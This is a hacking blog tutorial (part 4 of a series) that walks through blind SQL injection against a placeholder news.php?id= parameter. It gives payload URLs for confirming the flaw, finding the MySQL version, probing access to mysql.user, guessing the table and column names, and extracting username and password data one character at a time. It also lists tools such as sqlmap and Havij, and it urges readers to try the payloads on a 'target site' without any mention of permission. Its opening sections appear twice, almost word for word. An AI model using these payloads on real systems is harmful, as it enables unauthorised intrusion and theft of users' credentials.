Welcome all! This is part 4 out of a series!

+———————-+

|Checking for injection|

+———————-+

Let’s get right into it with how to to check for blind SQL injection. The method is different from normal SQL injection so try both on a target site!

http://www.site.com/news.php?id=5

The above link will load a page with some media and stuff…

http://www.site.com/news.php?id=5 and 1=1

This link will show the same media because 1=1 is true

http://www.site.com/news.php?id=5 and 1=2

Now when this link is inputted some media will disappear and stuff will stop working. If the above statement makes things stop showing or working then the site is vulnerable.

+—————-+

|Checking version|

+—————-+

To find the version of a vulnerable site we use the sql:

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

If the URL above returns True than it is version four if the url below turns up as true we know it is version five:

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

+—————————————-+

|Checking what commands we have access to|

+—————————————-+

Next we need to find what functions we have access to. First we want to check for the select function:

http://www.site.com/news.php?id=5 and (select 1)=1

If the page above loads normally than we can use select. Next if we have access to mysql.user:

http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1

If the page loads normally than once again we have access. If you don’t access to either of the commands than it will make life easier.

This is part 4 out of a series! For this tutorial we will be talking about Blind SQL injection.

+———————-+

|Checking for injection|

+———————-+

Let’s get right into it with how to to check for blind SQL injection. The method is different from normal SQL injection so try both on a target site!

http://www.site.com/news.php?id=5

The above link will load a page with some media and stuff…

http://www.site.com/news.php?id=5 and 1=1

This link will show the same media because 1=1 is true

http://www.site.com/news.php?id=5 and 1=2

Now when this link is inputted some media will disappear and stuff will stop working. If the above statement makes things stop showing or working then the site is vulnerable.

+—————-+

|Checking version|

+—————-+

To find the version of a vulnerable site we use the sql:

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

If the URL above returns True than it is version four if the url below turns up as true we know it is version five:

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

+—————————————-+

|Checking what commands we have access to|

+—————————————-+

Next we need to find what functions we have access to. First we want to check for the select function:

http://www.site.com/news.php?id=5 and (select 1)=1

If the page above loads normally than we can use select. Next if we have access to mysql.user:

http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1

If the page loads normally than once again we have access. If you don’t access to either of the commands than it will make life easier. I will cover how to get around using the commands in a later tutorial!

+——————————+

|Getting table and column names|

+——————————+

This is where you need to use your guessing powers. The below SQL will check if the table ‘users’ exists or not. Remember if content loads = true if it doesn’t = false.

http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1

You have to have the limit function in there because select only takes one query at a time.

Once you have found a table you need to get the columns. Again, this is trial and error. If we have the table users the below injection will check if the columns “password” exists:

http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

A lot right? Now that you have the columns and tables you need let’s get the data.

+—————–+

|Gettin’ ‘dat data|

+—————–+

I am warning you this part is really annoying and complicated!

So what you have to do is first insert the columns and data into the SQL statement below:

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

At the end is the number 80 this represents an ascii value. You can find an ascii chart here: http://www.asciitable.com/

We are going to have to increase the number at the far right until we get false. Once we get false the number under that is the first ascii number of that data.

After you get one letter increase the limit function from 1,1 to 2,1 to 3,1 etc. Letter by letter you will get data.

Since this is so slow most people use SQL injection tools to make it go faster!

+——————-+

|SQL Injection Tools|

+——————-+

I might give a tutorial on one of these later but here is a list with pros and cons of the main tools used:

sqlmap – really easy and pretty fast not really any cons

sqlninja – explanatory but pretty slow

Havij – uses Google Dorks and nice output format

SQLsus – super fast but hard to use overall

The Mole – simple and not a lot to it limited options

+—————–+

|Hope you enjoyed!|

+—————–+

Hope you enjoyed this tutorial! It took a long time but I hope you guys learned from it!

Next tutorial will be about making our own SQL injection tool!

Hack on!

6 COMMENTS

  1. Hey there would you mind letting me know which hosting company you’re using?
    I’ve loaded your blog in 3 completely different browsers and I must say this blog loads a lot faster then most.
    Can you recommend a good internet hosting provider at
    a reasonable price? Kudos, I appreciate it!

    • Hey Joanna, blogs are hosted for free at WordPress.com. It applies for me too. And I’m happy that the site loads fast, thereby making it flexible for visitors. I’ll recommend Bluehost for hosting purposes, as it is also officially supported by WordPress.
      Which Hosting provider are u using by the way?

LEAVE A REPLY

Please enter your comment!
Please enter your name here